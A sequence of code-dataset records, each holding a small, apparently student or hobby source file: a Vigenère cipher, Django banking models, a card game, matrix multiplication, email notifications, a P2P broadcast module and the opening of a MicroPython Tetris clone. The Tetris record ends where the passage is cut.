+{"seq_id":"458207185","text":"from sys import argv, exit\n\n# checks if argument is valid\nif len(argv) != 2:\n exit(\"Usage: python vigenere.py k\")\nelif not argv[1].isalpha():\n exit(\"Usage: python vigenere.py k\")\n\n\nkeyWord = argv[1]\n# keyword values\nkeyNum = []\n\nfor i in keyWord:\n if i.isalpha() and i.isupper():\n keyNum.append(ord(i) - ord('A'))\n elif i.isalpha() and i.islower():\n keyNum.append(ord(i) - ord('a'))\n else:\n keyNum.append(ord(i))\n\n# gets plaintext\nplaintext = input(\"Plaintext: \")\n# counter to loop over the key word\nkeyCounter = 0\n#print ciphertext\nprint(\"ciphertext: \", end=\"\")\n\nfor i in plaintext:\n\n # Ciphertext\n ciphertext = ord(i) + keyNum[keyCounter]\n\n\n if i.isupper() and ciphertext > 90:\n ciphertext = ciphertext - 26\n elif i.islower() and ciphertext > 122:\n ciphertext = ciphertext - 26\n\n # deacrease counter if k not alpha\n elif not i.isalpha():\n ciphertext = ord(i)\n if keyCounter > 0:\n keyCounter -= 1\n else:\n keyCounter = 0\n\n\n # rest if the counter = keyNum\n if keyCounter == (len(keyNum) - 1):\n keyCounter = 0\n # in case not reach max\n else:\n keyCounter += 1\n\n # make it ciphertext\n print(chr(ciphertext), end=\"\")\n\nprint(\"\")","sub_path":"pset6/vigenere.py","file_name":"vigenere.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"149738554","text":"from django.db import models\nfrom django.core.validators import (\n MinValueValidator,\n MaxValueValidator,\n)\nimport uuid\n\n# Create your models here.\nclass Users(models.Model):\n\n id = models.UUIDField(\n primary_key=True, unique=True, editable=False,\n default=uuid.uuid4\n )\n\n first_name = models.CharField(max_length=30)\n last_name = models.CharField(max_length=30)\n\n username = models.CharField(\n max_length=30, unique=True, null=True, blank=True,\n help_text=(\n 'Required. 30 characters or fewer. Letters, digits and '\n 'Use special characters in case the given username is repeated'\n ))\n\n dob = models.DateField(blank=False, null=False)\n address = models.CharField(max_length=100)\n\n password = models.CharField(\n max_length=300, unique=False, null=True, blank=True,\n help_text=(\n 'Required. 30 characters or fewer. Letters, digits and '\n 'special characters'\n ))\n\n def __str__(self):\n return str(self.username)\n\nclass Account(models.Model):\n account_id = models.UUIDField(\n primary_key=True,\n editable=False,\n unique=True,\n default=uuid.uuid4\n )\n user = models.ForeignKey(\n Users, on_delete=models.CASCADE, related_name='accounts'\n )\n\n #using MinValueValidator and MaxValueValidator to validate account number to have 8 digits\n\n account_no = models.IntegerField(\n unique=True,\n validators=[\n MinValueValidator(10000000),\n MaxValueValidator(99999999)\n ],\n null=True, blank=True\n )\n\n #validating password to have special characters and upper and lower case letters and digits\n pin = models.CharField(\n max_length=6,\n unique=False, null=True, blank=True,\n help_text=(\n 'Required. 6 digits'\n ))\n\n balance = models.DecimalField(decimal_places=2, max_digits=15)\n\n def __str__(self):\n return str(self.account_no) + \" balance: \" + str(self.balance)\n\n\nclass AllTransactions(models.Model):\n time = models.DateTimeField(auto_now_add=True)\n\n account = models.ForeignKey(\n Account, on_delete=models.CASCADE, related_name=\"account\"\n )\n receiveracc = models.ForeignKey(\n Account, on_delete=models.CASCADE,\n null=True, blank=True, related_name=\"receiversacc\"\n )\n withdrawstatus = models.DecimalField(\n decimal_places=2, max_digits=15, null=True, blank=True\n )\n depositstatus = models.DecimalField(\n decimal_places=2, max_digits=15, null=True, blank=True\n )\n transferedMoney = models.DecimalField(\n decimal_places=2, max_digits=15, null=True, blank=True\n )\n","sub_path":"bankingapp/apps/netbankingapp/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"460675259","text":"\n\nfrom xai.brain.wordbase.nouns._contradiction import _CONTRADICTION\n\n#calss header\nclass _CONTRADICTIONS(_CONTRADICTION, ):\n\tdef __init__(self,): \n\t\t_CONTRADICTION.__init__(self)\n\t\tself.name = \"CONTRADICTIONS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"contradiction\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_contradictions.py","file_name":"_contradictions.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"50824473","text":"# Skeleton Program code for the AQA COMP1 Summer 2014 examination\r\n# this code should be used in conjunction with the Preliminary Material\r\n# written by the AQA Programmer Team\r\n# developed in the Python 3.2 programming environment\r\n# version 2 edited 06/03/2014\r\n\r\nimport random, datetime\r\n\r\nNO_OF_RECENT_SCORES = 3\r\n\r\nclass TCard():\r\n def __init__(self):\r\n self.Suit = 0\r\n self.Rank = 0\r\n\r\nclass TRecentScore():\r\n def __init__(self):\r\n self.Name = ''\r\n self.Score = 0\r\n self.Date = None\r\n\r\nDeck = [None]\r\nRecentScores = [None]\r\nChoice = ''\r\nAceHigh = False\r\n\r\ndef GetRank(RankNo):\r\n Rank = ''\r\n if RankNo == 1:\r\n Rank = 'Ace'\r\n elif RankNo == 2:\r\n Rank = 'Two'\r\n elif RankNo == 3:\r\n Rank = 'Three'\r\n elif RankNo == 4:\r\n Rank = 'Four'\r\n elif RankNo == 5:\r\n Rank = 'Five'\r\n elif RankNo == 6:\r\n Rank = 'Six'\r\n elif RankNo == 7:\r\n Rank = 'Seven'\r\n elif RankNo == 8:\r\n Rank = 'Eight'\r\n elif RankNo == 9:\r\n Rank = 'Nine'\r\n elif RankNo == 10:\r\n Rank = 'Ten'\r\n elif RankNo == 11:\r\n Rank = 'Jack'\r\n elif RankNo == 12:\r\n Rank = 'Queen'\r\n elif RankNo == 13:\r\n Rank = 'King'\r\n \r\n return Rank\r\n\r\ndef GetSuit(SuitNo):\r\n Suit = ''\r\n if SuitNo == 1:\r\n Suit = 'Clubs'\r\n elif SuitNo == 2:\r\n Suit = 'Diamonds'\r\n elif SuitNo == 3:\r\n Suit = 'Hearts'\r\n elif SuitNo == 4:\r\n Suit = 'Spades'\r\n return Suit\r\n\r\ndef DisplayMenu():\r\n print()\r\n print('MAIN MENU')\r\n print()\r\n print('1. Play game (with shuffle)')\r\n print('2. Play game (without shuffle)')\r\n print('3. Display recent scores')\r\n print('4. Reset recent scores')\r\n print('5. Options')\r\n print('6. Save high scores')\r\n print()\r\n print('Select an option from the menu (or enter q to quit): ', end='')\r\n\r\ndef GetMenuChoice():\r\n Choice = input()\r\n if Choice == \"Quit\" or Choice == \"Q\":\r\n Choice = \"q\"\r\n print()\r\n return Choice\r\n\r\ndef BubbleSortScores(RecentScores):\r\n Swapped = True\r\n while Swapped:\r\n Swapped = False\r\n for count in range(1, NO_OF_RECENT_SCORES):\r\n if RecentScores[count].Score < RecentScores[count+1].Score:\r\n temp = RecentScores[count]\r\n RecentScores[count] = RecentScores[count+1]\r\n RecentScores[count+1] = temp\r\n Swapped = True\r\n \r\n\r\ndef SaveScores(RecentScores):\r\n with open(\"save_scores.txt\",mode=\"w\",encoding=\"utf-8\") as my_file:\r\n for each in range(1,NO_OF_RECENT_SCORES+1):\r\n my_file.write(RecentScores[each].Name+\"\\n\")\r\n my_file.write(str(RecentScores[each].Score)+\"\\n\")\r\n my_file.write(str(RecentScores[each].Date)+\"\\n\")\r\n \r\ndef LoadScores():\r\n for count in range(2):\r\n try:\r\n with open(\"save_scores.txt\",mode=\"r\",encoding=\"utf-8\") as my_file:\r\n for line in range(1, NO_OF_RECENT_SCORES+1):\r\n RecentScores[line].Name = my_file.readline()\r\n RecentScores[line].Score = my_file.readline()\r\n RecentScores[line].Date = my_file.readline()\r\n except IOError:\r\n SaveScores(RecentScores)\r\n \r\n\r\ndef DisplayOptions():\r\n print(\"Options menu\")\r\n print()\r\n print(\"1. Set Ace to be HIGH or LOW\")\r\n print(\"2. Card of same score ends game.\")\r\n print()\r\n\r\ndef GetOptionChoice():\r\n OptionOne = False\r\n while not OptionOne:\r\n OptionChoice = input(\"Select an option from the menu (or enter Q to quit): \")\r\n if OptionChoice == \"1\" or \"Q\":\r\n OptionOne = True\r\n else:\r\n OptionOne = False\r\n OptionChoice = OptionChoice.lower()\r\n return OptionChoice\r\n\r\ndef SetOptions(OptionChoice):\r\n if OptionChoice == \"1\":\r\n AceHigh = SetAceHighOrLow()\r\n elif OptionChoice == \"2\":\r\n SetSameScore()\r\n\r\ndef SetAceHighOrLow():\r\n AceHigh = False\r\n HighLow = False\r\n while not HighLow:\r\n AceChoice = input(\"Do you want Ace to be (h)igh or (l)ow: \")\r\n if AceChoice == \"h\":\r\n AceHigh = True\r\n HighLow = True\r\n print(\"Ace has been set to HIGH\")\r\n elif AceChoice == \"l\":\r\n AceHigh = False\r\n HighLow = True\r\n return AceHigh\r\n\r\ndef SetSameScore():\r\n SameCard = False\r\n valid = False\r\n while not valid:\r\n SameCardChoice = input(\"If the next card is the same as the last, end game? (y or n): \")\r\n SameCardChoice = SameCardChoice.lower()\r\n if SameCardChoice == \"y\":\r\n SameCard = True\r\n valid = True\r\n elif SameCardChoice == \"n\":\r\n SameCard = False\r\n valid = True\r\n else:\r\n print(\"Please enter either \\\"Y\\\" or \\\"N\\\" \")\r\n valid = False\r\n\r\ndef LoadDeck(Deck):\r\n CurrentFile = open('deck.txt', 'r')\r\n Count = 1\r\n while True:\r\n LineFromFile = CurrentFile.readline()\r\n if not LineFromFile:\r\n CurrentFile.close()\r\n break\r\n Deck[Count].Suit = int(LineFromFile)\r\n LineFromFile = CurrentFile.readline()\r\n Deck[Count].Rank = int(LineFromFile)\r\n Count = Count + 1\r\n \r\ndef ShuffleDeck(Deck):\r\n SwapSpace = TCard()\r\n NoOfSwaps = 1000\r\n for NoOfSwapsMadeSoFar in range(1, NoOfSwaps + 1):\r\n Position1 = random.randint(1, 52)\r\n Position2 = random.randint(1, 52)\r\n SwapSpace.Rank = Deck[Position1].Rank\r\n SwapSpace.Suit = Deck[Position1].Suit\r\n Deck[Position1].Rank = Deck[Position2].Rank\r\n Deck[Position1].Suit = Deck[Position2].Suit\r\n Deck[Position2].Rank = SwapSpace.Rank\r\n Deck[Position2].Suit = SwapSpace.Suit\r\n\r\ndef DisplayCard(ThisCard):\r\n print()\r\n print('Card is the', GetRank(ThisCard.Rank), 'of', GetSuit(ThisCard.Suit))\r\n print()\r\n\r\ndef GetCard(ThisCard, Deck, NoOfCardsTurnedOver):\r\n ThisCard.Rank = Deck[1].Rank\r\n ThisCard.Suit = Deck[1].Suit\r\n for Count in range(1, 52 - NoOfCardsTurnedOver):\r\n Deck[Count].Rank = Deck[Count + 1].Rank\r\n Deck[Count].Suit = Deck[Count + 1].Suit\r\n Deck[52 - NoOfCardsTurnedOver].Suit = 0\r\n Deck[52 - NoOfCardsTurnedOver].Rank = 0\r\n\r\ndef IsNextCardHigher(LastCard, NextCard, AceHigh):\r\n Higher = False\r\n \r\n if AceHigh == False:\r\n if NextCard.Rank > LastCard.Rank:\r\n Higher = True\r\n\r\n elif AceHigh == True:\r\n if NextCard.Rank == 1 and LastCard.Rank != 1:\r\n Higher = True\r\n elif LastCard.Rank == 1:\r\n Higher = False\r\n elif NextCard.Rank > LastCard.Rank:\r\n Higher = True\r\n return Higher\r\n\r\ndef GetPlayerName():\r\n print()\r\n NameMan = False\r\n while not NameMan:\r\n PlayerName = input('Please enter your name: ')\r\n if PlayerName == \"\":\r\n print(\"You have to enter a name!\")\r\n else:\r\n if len(PlayerName) > 11:\r\n print(\"Sorry, that name is too long.\")\r\n else:\r\n NameMan = True\r\n print()\r\n return PlayerName\r\n\r\ndef GetChoiceFromUser():\r\n Choice = input('Do you think the next card will be higher than the last card (enter y or n)? ')\r\n Choice = Choice.lower()\r\n if Choice == \"yes\":\r\n Choice = \"y\"\r\n if Choice == \"no\":\r\n Choice = \"n\"\r\n return Choice\r\n\r\ndef DisplayEndOfGameMessage(Score):\r\n print()\r\n print('GAME OVER!')\r\n print('Your score was', Score)\r\n if Score == 51:\r\n print('WOW! You completed a perfect game.')\r\n print()\r\n\r\ndef DisplayCorrectGuessMessage(Score):\r\n print()\r\n print('Well done! You guessed correctly.')\r\n print('Your score is now ', Score, '.', sep='')\r\n print()\r\n\r\ndef ResetRecentScores(RecentScores):\r\n for Count in range(1, NO_OF_RECENT_SCORES + 1):\r\n RecentScores[Count].Name = ''\r\n RecentScores[Count].Score = 0\r\n\r\ndef DisplayRecentScores(RecentScores):\r\n print()\r\n print('Recent Scores: ')\r\n print()\r\n print(\"{0}{1:>14}{2:>14}\".format(\"Name\",\"Score\",\"Date\"))\r\n for Count in range(1, NO_OF_RECENT_SCORES + 1):\r\n print(\"{0}{1:>{2}}{3:>14}\".format(RecentScores[Count].Name, RecentScores[Count].Score,18-(len(RecentScores[Count].Name)), RecentScores[Count].Date))\r\n print()\r\n print('Press the Enter key to return to the main menu')\r\n input()\r\n print()\r\n\r\ndef UpdateRecentScores(RecentScores, Score):\r\n PlayerName = GetPlayerName()\r\n FoundSpace = False\r\n Count = 1\r\n while (not FoundSpace) and (Count <= NO_OF_RECENT_SCORES):\r\n if RecentScores[Count].Name == '':\r\n FoundSpace = True\r\n else:\r\n Count = Count + 1\r\n if not FoundSpace:\r\n for Count in range(1, NO_OF_RECENT_SCORES):\r\n RecentScores[Count].Name = RecentScores[Count + 1].Name\r\n RecentScores[Count].Score = RecentScores[Count + 1].Score\r\n Count = NO_OF_RECENT_SCORES\r\n RecentScores[Count].Name = PlayerName\r\n RecentScores[Count].Score = Score\r\n DateNow = datetime.date.today()\r\n RecentScores[Count].Date = DateNow.strftime(\"%d/%m/%y\")\r\n\r\ndef PlayGame(Deck, RecentScores):\r\n LastCard = TCard()\r\n NextCard = TCard()\r\n GameOver = False\r\n GetCard(LastCard, Deck, 0)\r\n DisplayCard(LastCard)\r\n NoOfCardsTurnedOver = 1\r\n while (NoOfCardsTurnedOver < 52) and (not GameOver):\r\n GetCard(NextCard, Deck, NoOfCardsTurnedOver)\r\n Choice = ''\r\n while (Choice != 'y') and (Choice != 'n'):\r\n Choice = GetChoiceFromUser()\r\n DisplayCard(NextCard)\r\n NoOfCardsTurnedOver = NoOfCardsTurnedOver + 1\r\n Higher = IsNextCardHigher(LastCard, NextCard, AceHigh)\r\n if (Higher and Choice == 'y') or (not Higher and Choice == 'n'):\r\n DisplayCorrectGuessMessage(NoOfCardsTurnedOver - 1)\r\n LastCard.Rank = NextCard.Rank\r\n LastCard.Suit = NextCard.Suit\r\n else:\r\n GameOver = True\r\n if GameOver:\r\n DisplayEndOfGameMessage(NoOfCardsTurnedOver - 2)\r\n Scoreboard = input(\"Would you like to add your score to the high score table? (Y/N): \")\r\n Scoreboard = Scoreboard.lower()\r\n if Scoreboard == \"y\":\r\n UpdateRecentScores(RecentScores, NoOfCardsTurnedOver - 2)\r\n \r\n else:\r\n DisplayEndOfGameMessage(51)\r\n UpdateRecentScores(RecentScores, 51)\r\n\r\nif __name__ == '__main__':\r\n for Count in range(1, 53):\r\n Deck.append(TCard())\r\n for Count in range(1, NO_OF_RECENT_SCORES + 1):\r\n RecentScores.append(TRecentScore())\r\n Choice = ''\r\n while Choice != 'q':\r\n LoadScores()\r\n DisplayMenu()\r\n Choice = GetMenuChoice()\r\n if Choice == '1':\r\n LoadDeck(Deck)\r\n ShuffleDeck(Deck)\r\n PlayGame(Deck, RecentScores)\r\n elif Choice == '2':\r\n LoadDeck(Deck)\r\n PlayGame(Deck, RecentScores)\r\n elif Choice == '3':\r\n BubbleSortScores(RecentScores)\r\n DisplayRecentScores(RecentScores)\r\n elif Choice == '4':\r\n ResetRecentScores(RecentScores)\r\n elif Choice == \"5\":\r\n DisplayOptions()\r\n OptionChoice = GetOptionChoice()\r\n SetOptions(OptionChoice)\r\n elif Choice == \"6\":\r\n SaveScores(RecentScores)\r\n","sub_path":"Skeleton Program.py","file_name":"Skeleton Program.py","file_ext":"py","file_size_in_byte":10305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"82441446","text":"#!/usr/bin/python3\n\"\"\"\nThis is the \"lazy_matrix_mul\" module.\n\nThe lazy_matrix_mul module does matrix multiplication using numpy.dot\n\"\"\"\n\n\nimport numpy as np\n\n\ndef lazy_matrix_mul(m_a, m_b):\n \"\"\"\n Takes in two Matrix and Multiplies them\n Return: a new matrix\n \"\"\"\n if not m_a:\n raise ValueError(\"m_a can't be empty\")\n if not m_b:\n raise ValueError(\"m_b can't be empty\")\n if not isinstance(m_a, list):\n raise TypeError(\"m_a must be a list\")\n if not isinstance(m_b, list):\n raise TypeError(\"m_b must be a list\")\n if not isinstance(m_a[0], list):\n raise TypeError(\"m_a must be a list\")\n if not isinstance(m_b[0], list):\n raise TypeError(\"m_b must be a list\")\n row_len = len(m_a[0])\n for i in m_a:\n if not len(i) == row_len:\n raise TypeError(\"each row of m_a must should be of the same size\")\n for j in i:\n if not (isinstance(j, int) or isinstance(j, float)):\n raise TypeError(\"m_a should contain only integers or floats\")\n row_len = len(m_b[0])\n for i in m_b:\n if not len(i) == row_len:\n raise TypeError(\"each row of m_b must should be of the same size\")\n for j in i:\n if not (isinstance(j, int) or isinstance(j, float)):\n raise TypeError(\"m_b should contain only integers or floats\")\n\n if not len(m_a[0]) == len(m_b):\n raise ValueError(\"m_a and m_b can't be multiplied\")\n m_c = np.dot(m_a, m_b)\n return m_c\n","sub_path":"0x06-python-test_driven_development/101-lazy_matrix_mul.py","file_name":"101-lazy_matrix_mul.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"187507800","text":"# -*- coding: utf-8 -*-\n\nfrom django.core.management.base import BaseCommand\nfrom django.conf import settings\nfrom django.core.mail import get_connection, EmailMultiAlternatives\nfrom django.contrib.sites.models import Site\nfrom django.core.urlresolvers import reverse\nfrom django.template.loader import render_to_string\nfrom django.utils.translation import ugettext as _\n\nfrom users.models import UserProfile\nimport time\n\n\nclass Command(BaseCommand):\n help = \"Send new mail notifications via email\"\n\n option_list = BaseCommand.option_list\n\n def handle(self, **options):\n notify_messages = []\n for user_profile in UserProfile.objects.exclude(send_notify_messages__isnull=True):\n user = user_profile.user\n unread_count = user_profile.send_notify_messages.count()\n\n user_profile.send_notify_messages.clear()\n\n subject = _(u'{0}, у вас есть новые сообщения').format(user.first_name)\n\n domain = Site.objects.get_current().domain\n mail_url = 'http://' + domain + reverse('mail.views.mail_page')\n unread_count_string = get_string(unread_count)\n\n plain_text = _(u'Здравствуйте, {0}.') + '\\n\\n' + \\\n _(u'У вас {1} {2}.') + '\\n' + \\\n _(u'Посмотреть сообщения:') + '\\n' + \\\n u'{3}\\n\\n' + \\\n u'-- \\n' + \\\n _(u'С уважением,') + '\\n' + \\\n _(u'команда Anytask.')\n plain_text = plain_text.format(user.first_name, unread_count, unread_count_string, mail_url)\n\n context = {\n \"user\": user,\n \"user_profile\": user_profile,\n \"domain\": 'http://' + domain,\n \"unread_count\": unread_count,\n \"unread_count_string\": unread_count_string\n }\n html = render_to_string('email_notification_mail.html', context)\n\n from_email = settings.DEFAULT_FROM_EMAIL\n notify_messages.append((subject, plain_text, html, from_email, [user.email]))\n\n if notify_messages:\n send_mass_mail_html(notify_messages)\n time.sleep(1)\n\n\ndef get_string(num):\n if 11 <= num <= 14:\n return _(u\"новых сообщений\")\n elif str(num)[-1] == \"1\":\n return _(u\"новое сообщение\")\n elif str(num)[-1] in [\"2\", \"3\", \"4\"]:\n return _(u\"новых с��общения\")\n else:\n return _(u\"новых сообщений\")\n\n\ndef send_mass_mail_html(datatuple, fail_silently=False, user=None, password=None, connection=None):\n connection = connection or \\\n get_connection(username=user, password=password, fail_silently=fail_silently)\n messages = []\n for subject, plain_text, html, from_email, recipient in datatuple:\n message = EmailMultiAlternatives(subject, plain_text, from_email, recipient)\n message.attach_alternative(html, 'text/html')\n messages.append(message)\n\n return connection.send_messages(messages)\n","sub_path":"anytask/mail/management/commands/send_mail_notifications.py","file_name":"send_mail_notifications.py","file_ext":"py","file_size_in_byte":3144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"147999076","text":"class User():\n def __init__(self, firstname, lastname, sex, age):\n self.firstname = firstname\n self.lastname = lastname\n self.sex = sex\n self.age = age\n self.fullname = self.firstname+\" \"+self.lastname\n self.login_attempts = 0\n\n def describe_user(self):\n print(\"User Info: \\n\")\n print(\"Username: \"+self.fullname+\"\\tSex: \" + self.sex + \n \"\\tAge: \"+str(self.age))\n\n def greet_user(self, greet):\n print(greet + self.fullname)\n\n\n def reset_login_attempts(self):\n self.login_attempts = 0\n\n\n def increment_login_attempts(self):\n if self.login_attempts<3:\n print(\"login\")\n self.login_attempts+=1\n \n else:\n print('You have got 3 times to attemp to login.reset to 0')\n self.reset_login_attempts()\n\n\n\n\nuser1 = User(\"wang\", \"li\", \"woman\", 35)\nuser1.greet_user(\"Hello \")\nuser1.describe_user()\nuser1.increment_login_attempts()\n\n\nuser2 = User(\"Niu\", \"Xiaodong\", \"Man\", 48)\nuser2.greet_user(\"How are you,\")\nuser2.describe_user()\n","sub_path":"Chapter09/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"563670127","text":"import os\n\n\ndef run(bot, chat_id, user, keyConfig, message, totalResults=1):\n try:\n available_commands = [f for f in os.listdir(\"./commands\") if f.endswith(\".py\") and f != \"__init__.py\"]\n bot.sendMessage(chat_id=chat_id, text=\"I know:\\n\" + \"\\n\".join(map(lambda x: x[:-3], available_commands)))\n return True\n except:\n bot.sendMessage(chat_id=chat_id, text='I\\'m sorry ' + (user if not user == '' else 'Dave') +\n ', I\\'m afraid there\\'s no helping you.')","sub_path":"commands/help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"533381002","text":"import socket\nimport sys\nimport pickle\nfrom time import sleep\nfrom queue import Queue\nfrom _thread import *\nimport threading\nfrom threading import Thread\nimport superPeer\n\nsys.path.append('.\\\\LinearTopology')\n\nimport GLOBALS\nimport utility\n\nresponse = [[]]\nnum = 0\n\ndef addMessage():\n\t\"\"\"Initializes the Reponse list to make sure no old responses were left in it.\n\n\t\tArgs:\n\t\t\tNone\n\n\t\tReturns:\n\t\t\tNone\n\n\t\tGlobals:\n\t\t\tresponse - List to store the responses from the other Super Peers.\n\n\t\tCalls:\n\t\t\tNone\n\n\t\tCalled by:\n\t\t\tbroadcastMsg\n\n\t\"\"\"\n\tglobal response\n\tglobal num\n\tif num != 0:\n\t\tresponse.append([])\n\tfor x in GLOBALS.SUPER_PEER_LIST:\n\t\tresponse[num].append([])\n\tnum +=1\n\ndef broadcastQueryThread(msg, response, id, index):\n\t\"\"\"Sends a message to all other Super Peers.\n\n\t\tArgs:\n\t\t\tfilename (Str) - The name of the file to be searched for.\n\t\t\tresponse (List) - List that will store all of the responses form the super peers.\n\t\t\tid (int) - Then index for the list to put all of the data in\n\t\t\tindex (Int) - The index of response to store the answer from the Super Peer in.\n\n\t\tReturns:\n\t\t\tA list of leaf nodes that have a the file.\n\n\t\tGlobals:\n\n\t\tCalls:\n\n\t\tCalled by:\n\t\t\tbroadcastMsg()\n\t\"\"\"\n\tip = GLOBALS.SUPER_PEER_LIST[index][1]\n\tport = int(GLOBALS.SUPER_PEER_LIST[index][2])\n\thits = []\n\ttry:\n\t\tsock = socket.socket()\n\t\tsock.connect((ip, port))\n\t\tmsg = pickle.dumps(msg)\n\t\tsock.send(msg)\n\t\tdata = sock.recv(1024)\n\t\tdata = pickle.loads(data)\n\t\tif data is not -1:\n\t\t\tresponse[id][index] = data\n\t\t\tprint(\"[info] Broadcast lib: Response from Super Peer: \" + str(index) + \" : \" + str(data))\n\t\telse:\n\t\t\tprint(\"[info] Broadcast Lib: No hits\")\n\texcept socket.error as err:\n\t\tprint(\"[ERROR] Broadcast lib: Error connecting \" + str(ip) + \":\" + str(port))\n\tsock.close()\n\treturn\n\ndef broadcastQuery(msg):\n\t\"\"\"Spawns threads to send out the query to all other super peers\n\t\t\n\t\tArgs:\n\t\t\tmsg (query) - query object to get broadcasted\n\t\t\n\t\tReturns:\n\t\t\tresponse[msg.id] - list of responses from the other Super Peers\n\t\t\n\t\tGlobals:\n\t\t\tnum (Int) - used for msg ID's \n\t\t\tresponse (List) - stores the responses form the other Super Peers\n\t\t\t\n\t\tCalls:\n\t\t\tbroadcastQueryThread\n\t\t\n\t\tCalled by:\n\t\t\tsuperPeer.broadcastSearch\n\t\"\"\"\n\tthreads = []\n\tglobal num\n\tmsg.id = num\n\tglobal response\n\taddMessage()\n\tfor x in range(len(GLOBALS.SUPER_PEER_LIST)):\n\t\tif x == GLOBALS.SUPER_PEER_ID:\n\t\t\tcontinue\n\t\tproc = Thread(target = broadcastQueryThread, args = [msg, response, msg.id, x])\n\t\tproc.start()\n\t\tthreads.append(proc)\n\n\tfor proc in threads:\n\t\tproc.join()\n\tprint(\"All responses received\")\n\treturn response[msg.id]\n\t\ndef broadcastQueryHandler(con, msg):\n\t\"\"\"Handles query requests from other Super Peers\n\t\n\t\tArgs:\n\t\t\tcon (socket.socket) - socket object that holds the connection with the other Super Peer\n\t\t\tmsg (Query) - Query Object that holds the info for what file to look for\n\t\t\t\n\t\tReturns:\n\t\t\tvoid - Sends back a list of QueryHit objects if the file was found\n\t\t\t\n\t\tGlobals:\n\t\t\t\n\t\tCalls:\n\t\t\tsuperPeer.searchLocal \n\n\t\tCalled By:\n\t\t\tsuperPeer.superPeerThreadHandler\n\t\"\"\"\n\tfilename = msg.fname\n\tpeers = []\n\tprint(\"[info] Broadcast lib: Searching for file: \" + filename)\n\tpeers = superPeer.searchLocal(filename)\n\tif peers:\n\t\ttry:\n\t\t\tmsg = pickle.dumps(peers)\n\t\t\tcon.sendall(msg)\n\t\texcept:\n\t\t\tprint(\"[ERROR] Broadcast lib: Connection Failed\")\n\telse:\n\t\ttry:\n\t\t\tcon.send(pickle.dumps(-1))\n\t\texcept:\n\t\t\tprint(\"[ERROR] Broadcast lib: Connection Failed\")\n\treturn\n","sub_path":"Homework/PA3/Experiment/PA3/SuperPeer/bin/broadcastTopology/broadcast.py","file_name":"broadcast.py","file_ext":"py","file_size_in_byte":3515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"491553199","text":"from lib.database.bonds.munibonds import MuniBonds\nfrom lib.timeseries.model import TimeSeries\n\n\ndef main():\n ts = TimeSeries()\n ts.create_bonds()\n print(ts._summary_bonds.shape)\n ts.create_multivariate_ts(size=\"all\")\n\n cusip = '74514LB89'\n n = 5\n similar = ts.get_similar(cusip, n)\n\n print(similar)\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"sparse-rnn/testcodes/database/TestGetSimilar.py","file_name":"TestGetSimilar.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"504938606","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nZetCode PyQt5 tutorial\nThis is a Tetris game clone.\n\nAuthor: Jan Bodnar\nWebsite: zetcode.com\nLast edited: August 2017\n\"\"\"\n\n# from PyQt5.QtWidgets import QMainWindow, QFrame, QDesktopWidget, QApplication\n# from PyQt5.QtCore import Qt, QBasicTimer, pyqtSignal\n# from PyQt5.QtGui import QPainter, QColor\nimport random\nimport machine\nfrom lpc55 import Pin, SPI\nfrom lpc55 import CTimer\nfrom display import LCD154\n\nimport time\n\nFIELD_X = 70\nFIELD_Y = 0\n\nFIELD_WIDTH =100\nFIELD_HEIGHT=240\n\nKey_P = b'p'\nKey_Left = b'j'\nKey_Right = b'l'\nKey_Down = b'k'\nKey_Up = b'i'\nKey_Space = b' '\nKey_D = b'd'\n\nKeyStruct = {\n 'PIO1_18': [Key_Down, 0, None], # rotateRight, [key-value, ticks, Pin obj]\n 'PIO1_28': [Key_Space, 0, None], # drop down\n 'PIO1_31': [Key_Left, 0, None], # move left\n 'PIO1_29': [Key_Right, 0, None], # move right\n 'PIO1_30': [Key_Up, 0, None], # rotateLeft\n}\nDEBOUNCE_MS = 120\n\nWHITE = const(0xFFFF)\nBLACK = const(0x0000)\nBLUE = const(0x001F)\nBRED = const(0XF81F)\nGRED = const(0XFFE0)\nRED = const(0xF800)\nMAGENTA=const(0xF81F)\nGREEN = const(0x07E0)\nCYAN = const(0x07FF)\nYELLOW= const(0xFFE0)\nBROWN = const(0XBC40)\nBRRED = const(0XFC07)\nGRAY = const(0X8430)\n\nclass Tetris(object):\n Speed = 300\n\n def __init__(self, ks, lcd):\n\n # self.initUI()\n self.key_hand = ks\n self.tboard = Board(self)\n self.tboard.set_painter(lcd.lcd)\n self.tboard.start()\n\n def timerCB(self, hundred_ms):\n # print('hundred_ms = ', hundred_ms)\n keys = self.key_hand.Key_Values\n for k in keys:\n self.tboard.keyPressEvent(k)\n self.key_hand.Key_Values.clear()\n\n if hundred_ms % (self.Speed//100) == 0:\n self.tboard.timerEvent()\n\nclass Board():\n# msg2Statusbar = pyqtSignal(str)\n BoardWidth = 10\n BoardHeight = 24\n\n def __init__(self, parent):\n # super().__init__(parent)\n self.initBoard()\n\n def initBoard(self):\n '''initiates board'''\n # self.timer = QBasicTimer()\n self.isWaitingAfterLine = False\n\n self.curX = 0\n self.curY = 0\n self.numLinesRemoved = 0\n self.board = []\n\n # self.setFocusPolicy(Qt.StrongFocus)\n self.isStarted = False\n 